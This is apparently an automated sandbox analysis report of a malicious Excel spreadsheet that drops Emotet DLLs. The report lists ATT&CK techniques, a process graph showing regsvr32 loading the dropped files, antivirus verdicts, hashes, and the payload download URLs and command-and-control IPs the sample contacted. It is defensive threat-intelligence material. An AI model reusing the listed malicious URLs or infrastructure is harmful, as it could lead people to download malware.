                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts2
                      Scripting
                      Path Interception111
                      Process Injection
                      131
                      Masquerading
                      OS Credential Dumping1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      Exfiltration Over Other Network Medium11
                      Encrypted Channel
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts2
                      Native API
                      Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                      Disable or Modify Tools
                      LSASS Memory1
                      Query Registry
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                      Non-Standard Port
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts43
                      Exploitation for Client Execution
                      Logon Script (Windows)Logon Script (Windows)1
                      Virtualization/Sandbox Evasion
                      Security Account Manager12
                      Security Software Discovery
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration15
                      Ingress Tool Transfer
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                      Process Injection
                      NTDS1
                      Virtualization/Sandbox Evasion
                      Distributed Component Object ModelInput CaptureScheduled Transfer3
                      Non-Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets2
                      Process Discovery
                      SSHKeyloggingData Transfer Size Limits24
                      Application Layer Protocol
                      Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common2
                      Scripting
                      Cached Domain Credentials1
                      Remote System Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Hidden Files and Directories
                      DCSync2
                      File and Directory Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job2
                      Obfuscated Files or Information
                      Proc Filesystem16
                      System Information Discovery
                      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      Regsvr32
                      /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 632039 Sample: melimar.com.xls Startdate: 23/05/2022 Architecture: WINDOWS Score: 100 54 Multi AV Scanner detection for domain / URL 2->54 56 Antivirus detection for URL or domain 2->56 58 Multi AV Scanner detection for dropped file 2->58 60 10 other signatures 2->60 7 EXCEL.EXE 7 25 2->7         started        12 svchost.exe 2->12         started        process3 dnsIp4 46 salledemode.com 160.153.40.1, 49175, 80 AS-26496-GO-DADDY-COM-LLCUS United States 7->46 48 kabeonet.pl 193.143.77.34, 49177, 49178, 80 KEIPL Poland 7->48 50 3 other IPs or domains 7->50 32 C:\Users\user\uxevr3.ocx, PE32+ 7->32 dropped 34 C:\Users\user\uxevr2.ocx, PE32+ 7->34 dropped 36 C:\Users\user\uxevr1.ocx, PE32+ 7->36 dropped 38 4 other malicious files 7->38 dropped 64 Document exploit detected (creates forbidden files) 7->64 66 Document exploit detected (UrlDownloadToFile) 7->66 14 regsvr32.exe 2 7->14         started        18 regsvr32.exe 2 7->18         started        20 regsvr32.exe 2 7->20         started        22 regsvr32.exe 7->22         started        file5 signatures6 process7 file8 40 C:\Windows\...\qMgBgEIcUslg.dll (copy), PE32+ 14->40 dropped 68 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->68 24 regsvr32.exe 14->24         started        42 C:\Windows\...\LaeOniCeFWEmCa.dll (copy), PE32+ 18->42 dropped 27 regsvr32.exe 2 18->27         started        44 C:\Windows\...\zbbayGuUXRtRt.dll (copy), PE32+ 20->44 dropped 30 regsvr32.exe 20->30         started        signatures9 process10 dnsIp11 62 System process connects to network (likely due to code injection or exploit) 24->62 52 173.82.82.196, 49179, 49181, 49182 MULTA-ASN1US United States 27->52 signatures12

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      melimar.com.xls58%VirustotalBrowse
                      melimar.com.xls32%MetadefenderBrowse
                      melimar.com.xls51%ReversingLabsDocument-Excel.Trojan.Abracadabra
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dll100%Joe Sandbox ML
                      C:\Users\user\uxevr3.ocx100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dll100%Joe Sandbox ML
                      C:\Users\user\uxevr1.ocx100%Joe Sandbox ML
                      C:\Users\user\uxevr2.ocx100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dll56%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dll41%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll29%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll59%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\uxevr1.ocx41%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\uxevr2.ocx29%MetadefenderBrowse
                      C:\Users\user\uxevr2.ocx59%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\uxevr3.ocx56%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\HtkzwckLMRsIno\zbbayGuUXRtRt.dll (copy)41%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\WFwVcxpK\qMgBgEIcUslg.dll (copy)56%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\XcSShRaCEZoMkA\LaeOniCeFWEmCa.dll (copy)29%MetadefenderBrowse
                      C:\Windows\System32\XcSShRaCEZoMkA\LaeOniCeFWEmCa.dll (copy)59%ReversingLabsWin64.Trojan.Emotet
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      kabeonet.pl1%VirustotalBrowse
                      salledemode.com12%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      https://173.82.82.196:8080/100%URL Reputationmalware
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://salledemode.com/tgroup.ge/x4bc2kL4BzGAeUsVi/100%Avira URL Cloudmalware
                      https://173.82.82.196/;100%Avira URL Cloudmalware
                      https://173.82.82.196/100%URL Reputationmalware
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      https://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/100%Avira URL Cloudmalware
                      http://www.kabeonet.pl/wp-admin/VWlAz5vWJNHDb/100%Avira URL Cloudmalware
                      http://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/100%Avira URL Cloudmalware
                      http://kabeonet.pl/wp-admin/VWlAz5vWJNHDb/100%Avira URL Cloudmalware
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      kabeonet.pl
                      193.143.77.34
                      truefalseunknown
                      salledemode.com
                      160.153.40.1
                      truetrueunknown
                      vipteck.com
                      188.114.97.10
                      truefalse
                        unknown
                        airliftlimo.com
                        159.203.19.2
                        truefalse
                          high
                          windowsupdatebg.s.llnwi.net
                          178.79.242.0
                          truefalse
                            unknown
                            www.kabeonet.pl
                            unknown
                            unknownfalse
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              http://salledemode.com/tgroup.ge/x4bc2kL4BzGAeUsVi/true
                              • Avira URL Cloud: malware
                              unknown
                              https://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/true
                              • Avira URL Cloud: malware
                              unknown
                              http://www.kabeonet.pl/wp-admin/VWlAz5vWJNHDb/true
                              • Avira URL Cloud: malware
                              unknown
                              http://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/true
                              • Avira URL Cloud: malware
                              unknown
                              http://kabeonet.pl/wp-admin/VWlAz5vWJNHDb/true
                              • Avira URL Cloud: malware
                              unknown
                              https://airliftlimo.com/wp-admin/iMc/false
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://173.82.82.196:8080/regsvr32.exe, 00000007.00000002.1223623480.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223280961.00000000002C9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223353489.0000000000309000.00000004.00000020.00020000.00000000.sdmptrue
                                • URL Reputation: malware
                                unknown
                                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://crl.entrust.net/server1.crl0regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://ocsp.entrust.net03regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://173.82.82.196/;regsvr32.exe, 00000009.00000002.1223353489.0000000000309000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://173.82.82.196/regsvr32.exe, 00000004.00000002.1223285742.00000000002D3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223623480.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223353489.0000000000309000.00000004.00000020.00020000.00000000.sdmptrue
                                  • URL Reputation: malware
                                  unknown
                                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://ocsp.entrust.net0Dregsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://secure.comodo.com/CPS0regsvr32.exe, 00000004.00000002.1223353771.0000000000310000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      159.203.19.2
                                      airliftlimo.comUnited States
                                      14061DIGITALOCEAN-ASNUSfalse
                                      188.114.97.10
                                      vipteck.comEuropean Union
                                      13335CLOUDFLARENETUSfalse
                                      173.82.82.196
                                      unknownUnited States
                                      35916MULTA-ASN1UStrue
                                      193.143.77.34
                                      kabeonet.plPoland
                                      29522KEIPLfalse
                                      160.153.40.1
                                      salledemode.comUnited States
                                      26496AS-26496-GO-DADDY-COM-LLCUStrue
                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                      Analysis ID:632039
                                      Start date and time: 23/05/202208:33:522022-05-23 08:33:52 +02:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 9m 31s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:melimar.com.xls
                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                      Number of analysed new started processes analysed:13
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.expl.evad.winXLS@16/16@5/5
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:
                                      • Successful, ratio: 51.4% (good quality ratio 27.6%)
                                      • Quality average: 32.8%
                                      • Quality standard deviation: 37.5%
                                      HCA Information:
                                      • Successful, ratio: 95%
                                      • Number of executed functions: 45
                                      • Number of non-executed functions: 246
                                      Cookbook Comments:
                                      • Found application associated with file extension: .xls
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                      • Attach to Office via COM
                                      • Scroll down
                                      • Close Viewer
                                      • Exclude process from analysis (whitelisted): dllhost.exe
                                      • Excluded IPs from analysis (whitelisted): 173.222.108.210, 173.222.108.226
                                      • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      TimeTypeDescription
                                      08:34:27API Interceptor2676x Sleep call for process: regsvr32.exe modified
                                      08:34:31API Interceptor221x Sleep call for process: svchost.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      159.203.19.2AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                        SecuriteInfo.com.XLM.Trojan.Abracadabra.42.Gen.2143.xlsGet hashmaliciousBrowse
                                          188.114.97.10#U03bd#U03ad#U03b1 #U03c0#U03b1#U03c1#U03b1#U03b3#U03b3#U03b5#U03bb#U03af#U03b1.exeGet hashmaliciousBrowse
                                          • www.caffinoze.com/uevb/?dN6TSf=5jiPs4hh22L&Zbptn=+kZlZtVkmK9mtN4R8ketZDyq6RgIaOfH1OSk9sfvnCuCv2janrsaP1j7b5HSpzHAlDvs
                                          invoicecopy.exeGet hashmaliciousBrowse
                                          • www.edu-onl-univ-net.com/pzja/?3f=zfCf2c616CyfxHguxZZm7DNwPDi8EB3UdjS0lxktw5y2F154ZGH7CQxfIJF4n79GUGC+&bPvxP=r8YPfT
                                          inward remittance.xlsxGet hashmaliciousBrowse
                                          • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                          xijREvMlOW.exeGet hashmaliciousBrowse
                                          • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                          proof of payment.xlsxGet hashmaliciousBrowse
                                          • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                          7KJG9mtgsK.exeGet hashmaliciousBrowse
                                          • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                          F8v1zSYyNE.exeGet hashmaliciousBrowse
                                          • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                          Enquiry 220519.exeGet hashmaliciousBrowse
                                          • www.belty.net/f7sb/?jN6LWTw=o1F6RDn0sBoDYo7h7gqtE434GJkKPSPCeJfVKwSkLQg71EAJ9C+Oj7XoejvxuceK6+Rk&jtU=nPLTHLD
                                          vbc.exeGet hashmaliciousBrowse
                                          • www.bupabii.site/ud5f/?1bsHsx=7nPxyDW8Iva4xf&iHt=ALfx5VHNdhW2uGqFmDqxYgHynhZL+44fq/uNEf/2poi8cDq081MUE8RtgpR85eIUxsfT
                                          RFQ 00078569_pdf.exeGet hashmaliciousBrowse
                                          • lokaxz.xyz/fc/bk/ss.php
                                          Due Payments.xlsxGet hashmaliciousBrowse
                                          • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                          Due Payments.xlsxGet hashmaliciousBrowse
                                          • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                          remittance confirmationpdf.exeGet hashmaliciousBrowse
                                          • lokaxz.xyz/fc/bk/ss.php
                                          http://halocem.org/azV0jAGet hashmaliciousBrowse
                                          • halocem.org/azV0jA
                                          200.xlsxGet hashmaliciousBrowse
                                          • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                          Odeme makbuzu.exeGet hashmaliciousBrowse
                                          • 5gw4d.xyz/PL341/index.php
                                          SWD0004 PO06350.exeGet hashmaliciousBrowse
                                          • www.floristeriascasablanca3.com/tgdh/?nPvXk=ZiOdQcdAFakp3noFfw0s5I3dZIhycVz4J/o2gsVSsyDVIUb2YJIwyoVnHcK0O/pnw9O7EPCsrQ==&aT=kdQ818F
                                          ryXm1NUc26.exeGet hashmaliciousBrowse
                                          • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                          xbgyAUmAXn.exeGet hashmaliciousBrowse
                                          • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
                                          lod4.xlsxGet hashmaliciousBrowse
                                          • qtd8gcdoplav737wretjqmaiy.ga/Basement/fre.php
                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          airliftlimo.comAGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                          • 159.203.19.2
                                          SecuriteInfo.com.XLM.Trojan.Abracadabra.42.Gen.2143.xlsGet hashmaliciousBrowse
                                          • 159.203.19.2
                                          vipteck.comAGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                          • 188.114.96.10
                                          XR-4966 report.xlsmGet hashmaliciousBrowse
                                          • 188.114.97.7
                                          XR-4966 report.xlsmGet hashmaliciousBrowse
                                          • 188.114.96.7
                                          2022-03-01_1429.xlsmGet hashmaliciousBrowse
                                          • 188.114.97.7
                                          New payment details and address update.xlsmGet hashmaliciousBrowse
                                          • 188.114.96.7
                                          New payment details and address update.xlsmGet hashmaliciousBrowse
                                          • 188.114.97.7
                                          GZY-010322 PQEM-010322.xlsmGet hashmaliciousBrowse
                                          • 188.114.96.17
                                          2022-03-01_0918.xlsmGet hashmaliciousBrowse
                                          • 188.114.96.7
                                          3907301615343637.xlsmGet hashmaliciousBrowse
                                          • 188.114.97.7
                                          3907301615343637.xlsmGet hashmaliciousBrowse
                                          • 172.67.142.136
                                          TVN-010322 OWUZ-010322.xlsmGet hashmaliciousBrowse
                                          • 188.114.97.7
                                          Form.xlsmGet hashmaliciousBrowse
                                          • 188.114.97.7
                                          salledemode.comAGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                          • 160.153.40.1
                                          dettagli-1605.xlsGet hashmaliciousBrowse
                                          • 160.153.40.1
                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          DIGITALOCEAN-ASNUSAGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                          • 159.203.19.2
                                          3vYbe1bYFd.dllGet hashmaliciousBrowse
                                          • 165.22.73.229
                                          3vYbe1bYFd.dllGet hashmaliciousBrowse
                                          • 165.22.73.229
                                          meerkat.arm7-20220522-2050Get hashmaliciousBrowse
                                          • 5.101.107.84
                                          nZNmWqwnpr.dllGet hashmaliciousBrowse
                                          • 165.22.73.229
                                          W3XqCWvDWC.dllGet hashmaliciousBrowse
                                          • 165.22.73.229
                                          JtJ50Swtfo.dllGet hashmaliciousBrowse
                                          • 165.22.73.229
                                          nZNmWqwnpr.dllGet hashmaliciousBrowse
                                          • 165.22.73.229
                                          W3XqCWvDWC.dllGet hashmaliciousBrowse
                                          • 165.22.73.229
                                          JtJ50Swtfo.dllGet hashmaliciousBrowse
                                          • 165.22.73.229
                                          VUzZGNPCim.dllGet hashmaliciousBrowse
                                          • 165.22.73.229
                                          ZWc3yi399O.dllGet hashmaliciousBrowse
                                          • 165.22.73.229
                                          QK2fMdqsA1.dllGet hashmaliciousBrowse
                                          • 165.22.73.229
                                          CVVgbFa04U.dllGet hashmaliciousBrowse
                                          • 165.22.73.229
                                          HN8n4TeTGO.dllGet hashmaliciousBrowse
                                          • 165.22.73.229
                                          VUzZGNPCim.dllGet hashmaliciousBrowse
                                          • 165.22.73.229
                                          ZWc3yi399O.dllGet hashmaliciousBrowse
                                          • 165.22.73.229
                                          QK2fMdqsA1.dllGet hashmaliciousBrowse
                                          • 165.22.73.229
                                          HN8n4TeTGO.dllGet hashmaliciousBrowse
                                          • 165.22.73.229
                                          CVVgbFa04U.dllGet hashmaliciousBrowse
                                          • 165.22.73.229
                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          7dcce5b76c8b17472d024758970a406bAGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          report 340.xlsGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          info_1.xlsGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          Facture_09.02.2022_V2.xlsbGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          Scan 69.xlsGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          Address Changed.xlsGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          10082376542717622006.xlsGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          6691113204648532361.xlsGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          E318709655.xlsGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          OGgZVa2y3B.xlsGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          E282497021.xlsGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          E2992512590.xlsGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          L1877777548.xlsGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          SecuriteInfo.com.Exploit.Siggen3.32399.24702.xlsGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          SecuriteInfo.com.Exploit.Siggen3.32401.11843.xlsGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          SecuriteInfo.com.Exploit.Siggen3.32389.1290.xlsGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          Contract - May 18, 2022 from Reliancecorp.xlsGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          SecuriteInfo.com.XLM.Trojan.Abracadabra.42.Gen.2143.xlsGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          L3776304198.xlsGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          c2552936256.xlsGet hashmaliciousBrowse
                                          • 188.114.97.10
                                          • 159.203.19.2
                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dllAGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dllAGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dllAGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                                Process:C:\Windows\System32\regsvr32.exe
                                                File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                                Category:dropped
                                                Size (bytes):61480
                                                Entropy (8bit):7.9951219482618905
                                                Encrypted:true
                                                SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                                MD5:B9F21D8DB36E88831E5352BB82C438B3
                                                SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                                SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                                SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                                Malicious:false
                                                Preview:MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7*I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU...*..V.{V6..m..D.-|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..| .#.......I...
                                                Process:C:\Windows\System32\regsvr32.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):330
                                                Entropy (8bit):3.120848828934212
                                                Encrypted:false
                                                SSDEEP:6:kKboJN+SkQlPlEGYRMY9z+4KlDA3RUesJ21:jkPlE99SNxAhUesE1
                                                MD5:DD749C9D2B59DD0A084BA3641BC08B06
